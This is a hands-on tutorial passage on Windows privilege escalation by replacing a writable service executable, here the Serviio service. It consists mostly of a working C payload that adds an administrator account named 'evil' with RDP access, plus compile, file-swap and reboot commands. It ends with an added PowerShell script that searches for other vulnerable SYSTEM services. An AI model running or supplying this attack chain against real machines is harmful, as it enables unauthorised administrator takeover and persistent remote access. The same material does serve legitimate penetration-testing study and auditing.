Another way to elevate privileges on a Windows system is to exploit insecure file permissions on the binary of a service that runs as NT AUTHORITY\SYSTEM: if the current user can write to the service executable (or to the directory that holds it), the executable can be swapped for one of our own, and the service control manager will run it as SYSTEM the next time the service starts. Example: the Serviio service.
<aside>
👨💻 adduser.c: a minimal payload that, when it runs as SYSTEM in place of the service binary, creates a local administrator who can also log in over RDP.

```c
#include <stdlib.h>

int main(void)
{
    /* Each command runs through cmd.exe with the privileges of the service
       (SYSTEM). "Remote Desktop Users" contains a space, so it must be
       double-quoted for cmd; the quotes are escaped inside the C string. */
    system("net user evil password /add");
    system("net localgroup administrators evil /add");
    system("net localgroup \"Remote Desktop Users\" evil /add");
    return 0;
}
```
</aside>
Compile adduser.c on Linux with the MinGW-w64 cross-compiler (32-bit target; use x86_64-w64-mingw32-gcc for a 64-bit service host): i686-w64-mingw32-gcc adduser.c -o adduser.exe
Replace the original ServiioService.exe binary with our malicious copy, keeping a backup of the original so the service can be restored afterwards. The move only succeeds because the current user has write access to the bin directory, which is exactly the misconfiguration being exploited:
move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"
move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe"
dir "C:\Program Files\Serviio\bin\"
Restart the service so the new binary gets executed: net stop Serviio followed by net start Serviio. Most of the time, however, the current user does not have permission to stop or start the service. If the service's start mode is "Auto", it will start by itself after a system reboot, which is enough. Check the start mode with: wmic service where caption="Serviio" get name, caption, state, startmode (wmic is deprecated on current Windows releases; in PowerShell, Get-CimInstance Win32_Service -Filter "Name='Serviio'" | Select-Object Name, Caption, State, StartMode returns the same fields).
Check whether the current user is allowed to reboot the machine: whoami /priv

| Privilege Name | Description | State |
| --- | --- | --- |
| SeShutdownPrivilege | Shut down the system | Disabled |

"Disabled" here only means the privilege is not currently enabled in the token; it is still held, and shutdown.exe enables it itself before use, so shutdown /r /t 0 works and the Auto-start service comes back up running our binary. If SeShutdownPrivilege is missing from the list entirely, the reboot has to wait for someone else, or the service has to be restarted some other way.
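The page shows the check only for Serviio and only after the fact. As an added example that is not part of the original page, the PowerShell script below generalises the prerequisite check: it enumerates every service running as LocalSystem, tests whether the current user's token (user SID plus all group SIDs, so Everyone, Authenticated Users and BUILTIN\Users count) holds a write-type right on the service executable or on its directory, reports the start mode and state the restart step depends on, and finally tells whether the token holds SeShutdownPrivilege. The function names Get-ServiceBinaryPath, Get-WritableSystemServices and Test-ShutdownPrivilege are my own; the script assumes an ImagePath that is either double-quoted or ends at the first ".exe", and it does not decode generic rights (GENERIC_WRITE, GENERIC_ALL) in ACEs.

```powershell
# Added example (not from the original page): enumerate services that run as
# LocalSystem whose executable, or the directory holding it, grants the
# current user's token a right that allows replacing the file, then report
# what the restart step needs (start mode, state, SeShutdownPrivilege).
# Run in a normal, non-elevated PowerShell session.
# Assumptions: ImagePath is double-quoted or ends at the first ".exe";
# generic rights (GENERIC_WRITE/GENERIC_ALL) in an ACE are not decoded.

function Get-ServiceBinaryPath {
    param([Parameter(Mandatory)][string]$PathName)
    # '"C:\Program Files\Serviio\bin\ServiioService.exe" -arg' -> quoted path
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    # 'C:\tool\svc.exe -arg' -> everything up to the first ".exe"
    if ($PathName -match '^(.*?\.exe)') { return $Matches[1] }
    return $PathName
}

function Get-WritableSystemServices {
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    # Every SID the token carries: the user plus all group memberships
    # (Everyone, Authenticated Users, BUILTIN\Users, ...). An ACE granted to
    # any of them applies to us.
    $sids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    # Only rights that let us overwrite, replace or delete the binary, or add a
    # file to its directory (WriteData on a directory == CreateFiles). Read and
    # execute bits, including Synchronize, are deliberately excluded so that
    # ordinary "Read & execute" ACEs do not produce false positives.
    $mask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, WriteExtendedAttributes, WriteAttributes, Delete, ChangePermissions, TakeOwnership'

    Get-CimInstance Win32_Service |
        Where-Object { $_.StartName -eq 'LocalSystem' -and $_.PathName } |
        ForEach-Object {
            $svc = $_
            $exe = Get-ServiceBinaryPath $svc.PathName
            foreach ($target in @($exe, (Split-Path -Path $exe -Parent))) {
                if (-not (Test-Path -LiteralPath $target)) { continue }
                try { $acl = Get-Acl -LiteralPath $target } catch { continue }
                foreach ($ace in $acl.Access) {
                    if ($ace.AccessControlType -ne 'Allow') { continue }
                    # Compare by SID so localized or renamed group names do not matter.
                    try {
                        $aceSid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
                    } catch { continue }
                    $hit = ($sids -contains $aceSid) -and ((([int]$ace.FileSystemRights) -band $mask) -ne 0)
                    if ($hit) {
                        [pscustomobject]@{
                            Service   = $svc.Name
                            StartMode = $svc.StartMode   # "Auto" = comes back after a reboot
                            State     = $svc.State
                            Writable  = $target
                            GrantedTo = $ace.IdentityReference.Value
                            Rights    = $ace.FileSystemRights
                        }
                    }
                }
            }
        }
}

function Test-ShutdownPrivilege {
    # whoami /priv lists every privilege the token holds; "Disabled" still
    # counts, because shutdown.exe enables SeShutdownPrivilege itself.
    return [bool]((whoami /priv) -match '^SeShutdownPrivilege\b')
}

Get-WritableSystemServices | Format-Table -AutoSize
if (Test-ShutdownPrivilege) {
    Write-Host 'SeShutdownPrivilege held: "shutdown /r /t 0" reboots the box and starts Auto services.'
} else {
    Write-Host 'No SeShutdownPrivilege: wait for a reboot or for the service to be restarted.'
}
```

A hit on the executable itself means the binary can be overwritten or renamed in place; a hit only on the directory still suffices for the move-based swap the page uses, provided the ACE includes Delete or the file inherits it. Rows whose StartMode is not "Auto" (or whose service the user cannot start) need a different trigger than a reboot.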